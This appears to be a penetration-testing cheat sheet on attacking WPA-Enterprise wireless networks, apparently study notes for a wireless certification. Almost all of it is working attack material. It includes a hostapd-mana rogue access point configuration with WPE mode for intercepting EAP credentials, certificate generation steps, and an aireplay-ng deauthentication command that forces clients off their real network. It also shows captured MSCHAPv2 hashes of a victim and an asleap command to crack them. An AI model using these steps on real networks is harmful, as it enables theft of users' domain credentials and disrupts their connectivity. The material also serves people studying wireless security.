WPA-Enterprise
WPA Enterprise enables user authentication against a central database. WPA Enterprise uses Extensible Authentication Protocol (EAP).
Monitor:
airodump-ng --band abg wlan0 # no channel
airodump-ng --channel 6 wlan0 # with channelCreate Certs
openssl x509 -in CERT_FILENAME -noout -enddate
openssl x509 -inform der -in CERTIFICATE_FILENAME -outform pem -out OUTPUT_PEM.crtOR
sudo apt install freeradiuscerts stored in "/etc/freeradius/3.0/certs"
cd /etc/freeradius/3.0/certs
makeCreate certs:
Mkdir Tools/wireless/Certs
cd Tools/wireless/Certs
openssl genrsa -out server.key 2048
openssl req -new -sha256 -key server.key -out csr.csr
openssl req -x509 -sha256 -days 365 -key server.key -in csr.csr -out server.pem
ln -s server.pem ca.pem
openssl dhparam 2048 > dhparam.pemCreate configuration:
# ------------------------------
# common hostapd configuration
# ------------------------------
interface=wlan1
ssid=TigerSecurities
channel=6
hw_mode=g
# --------------------
# WPA configuration
# --------------------
wpa=2 # use WPA2 version
wpa_key_mgmt=WPA-EAP # use external authentication server
wpa_pairwise=TKIP CCMP # pairwise encryption to use
# --------------------------
# EAP server configuration
# --------------------------
ieee8021x=1 # requires 802.1x authentication server
eapol_key_index_workaround=0 # EAPOL key index fix for WinXP supplicant (disabled here)
eap_server=1 # enable integrated EAP server instead of RADIUS
eap_user_file=fakenet.eap_user # filename containing information of users
# -------------------------------------------------
# certificate configuration for EAP-TLS/PEAP/TTLS
# -------------------------------------------------
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key # private key for the server certificate
private_key_passwd= # password used to encrypt the private key (empty here)
dh_file=/root/certs/dhparam.pem # file path to DH/DSA parameters file (in PEM format)
# -----------------------------
# mana specific configuration
# -----------------------------
mana_wpe=1 # enable WPE mode to intercept various EAP credentials
mana_eapsuccess=1 # return EAP success to the clients, and have them connectCreate user EAP file:
* PEAP,TTLS,TLS,MD5,GTC
"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP "1234test" [2]Deauth:
aireplay-ng --deauth 50 -a D2:E9:6A:D3:B3:50 -c 02:00:00:00:03:00 --ignore-negative-one wlan0Capture:
When a victim attempts to authenticate to our AP, the login attempt is captured.
...
wlan0: STA 00:2b:bb:b0:42:9e IEEE 802.11: authenticated
wlan0: STA 00:2b:bb:b0:42:9e IEEE 802.11: associated (aid 1)
wlan0: CTRL-EVENT-EAP-STARTED 00:2b:bb:b0:42:9e
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
MANA EAP Identity Phase 0: cosmo
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
MANA EAP Identity Phase 1: cosmo
MANA EAP EAP-MSCHAPV2 ASLEAP user=cosmo | asleap -C ce:b6:98:85:c6:56:59:0c -R 72:79:f6:5a:a4:98:70:f4:58:22:c8:9d:cb:dd:73:c1:b8:9d:37:78:44:ca:ea:d4
MANA EAP EAP-MSCHAPV2 JTR | cosmo:$NETNTLM$ceb69885c656590c$7279f65aa49870f45822c89dcbdd73c1b89d377844caead4:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | cosmo::::7279f65aa49870f45822c89dcbdd73c1b89d377844caead4:ceb69885c656590c
...Crack captured creds:
asleap -C ce:b6:98:85:c6:56:59:0c -R 72:79:f6:5a:a4:98:70:f4:58:22:c8:9d:cb:dd:73:c1:b8:9d:37:78:44:ca:ea:d4 -W /usr/share/john/password.lst
Basic info:
Authentication is done using a Remote Authentication Dial-In User Service (RADIUS)2 server. The client authenticates using a number of EAP frames, depending on the agreed upon authentication scheme, which are relayed by the AP to the RADIUS server. If authentication is successful, the result is then used as Pairwise Master Key (PMK) for the 4-way handshake, as opposed to PSK, where the passphrase is derived to generate the PMK.
It is common to use a username and password to authenticate, which could be tied to domain credentials.
Last updated